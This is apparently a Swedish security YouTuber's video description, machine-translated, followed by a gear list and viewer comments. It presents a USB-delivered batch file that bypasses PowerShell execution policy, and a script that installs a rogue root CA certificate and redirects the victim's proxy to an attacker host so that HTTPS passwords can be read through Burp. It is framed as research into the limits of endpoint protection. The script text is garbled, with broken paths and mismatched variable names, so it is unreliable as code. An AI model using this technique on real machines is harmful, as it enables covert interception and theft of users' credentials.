In this section of STÖK we run a simple powershell script via USB which installs a ugly root CA cert and at the same time resets the victim's machine so that it is surfing through our proxy server in azure. We then decode the SSL encryption via a BURP proxy and string passwords over HTTPS in plain text.
The attack is based on Microsoft's own software, Kali Linux and Burp Proxy, since the user is a local admin on the iron, the attack completely passes all the protection mechanisms in under 1 second. What we do is nothing strange and is fully supported. The thing is that this is something that more and more large companies are enjoying to access hackers / randomware. So they can read your passwords without knowing it.
The victim computer is max patched and has both a third party Machine Learning antivirus / malware solution active as well as another third party system that will block any unknown malicious code. SEK 150,000 firewall through which traffic goes through both advanced application blocks and extended controls. nuff said ..
We do this for research purposes because we HAVE to question the tools we users sometimes blindly rely on .. Like, for example, endpoint protection, patched os and expensive firewalls. Nothing is secure ..
— — securesurf.cmd
@echo off
echo. invoke powershellbypassmagic ..
powershell.exe -ep Bypass "& {Get-Content d: enableproxy_ca.ps1 | iex}
echo. donated.
PAUSE
— — enableproxy_ca.ps1
$ cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 ("d: cacert.der")
$ rootStore = Get-Item cert: LocalMachine Root
$ RootStore.Open ( "ReadWrite")
RootStore.Add $ ($ CC)
$ RootStore.Close ()
$ reg = "HKCU: Software Microsoft Windows CurrentVersion Internet Settings"
Set-ItemProperty -Path $ reg -Name ProxyServer -Value "your ip / hostname goes here"
Set-ItemProperty -Path $ reg -Name ProxyEnable -Value 1
Fredrik Alexandersson
[email protected]
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution.
Burp or Burp Suite is a graphical tool for testing Web application security.
———— — –
If you also want to get that STÖK vibe, here's my gear,
–CAMERA / STUDIO GEAR–
PANASONIC LUMIX GH5 4K
Nikon D850
DJI Osmo Pocket
Nikon AF-S FX NIKKOR 50mm f / 1.4G
PANASONIC LUMIX 12-35mm Camera Lens G X VARIO II, F2.8
Red VideoMicro Compact
Tascam DR-70D 4-Track Portable Audio Recorder
Blackmagic Design UltraStudio Mini Recorder – Thunderbolt
–COMPUTER–
Apple MacBook Pro
Dell Precision M5510 WorkStation
Dell U3419w Ultrasharp 34-Inch Curved
Logitech MX Master 2S Wireless Mouse
Apple Magic Keyboard with Numeric Keypad
Logitech HD Pro Webcam C920
QNAP TVS-672XT 6 Bay Thunderbolt 3 NAS
–STUDIO LIGHTS–
Philips Hue Smart Hub
Philips Hue Single Premium Smart Bulb, 16 million colors,
Philips Hue Smart Dimmer Switch with Remote
Softbox Lighting Kit
————- –
LOVE LOVES:
Could you reupload and replace the audio in english or add caption subtitles please. Thank you.
Please add your video in English…
Please Add English Sub
Nästan lättare att kika över axeln på chefen xD
please activate subtitles you crackhead. thanks
Fungerar det lika enkelt med Chrome på en windows maskin? 🤪
Kan detta göras fast man sätter en proxy på hela windows 10 så även google chrome och firefox mm. blir drabbade? Awesome video btw!
Make videos in english… I love your channel.
Grym studio
De här videosen är så jääävla gryma! Hur har du lärt dig allt & vad har du för utbildning? Keep it up!
Vad är det för språk ni talar?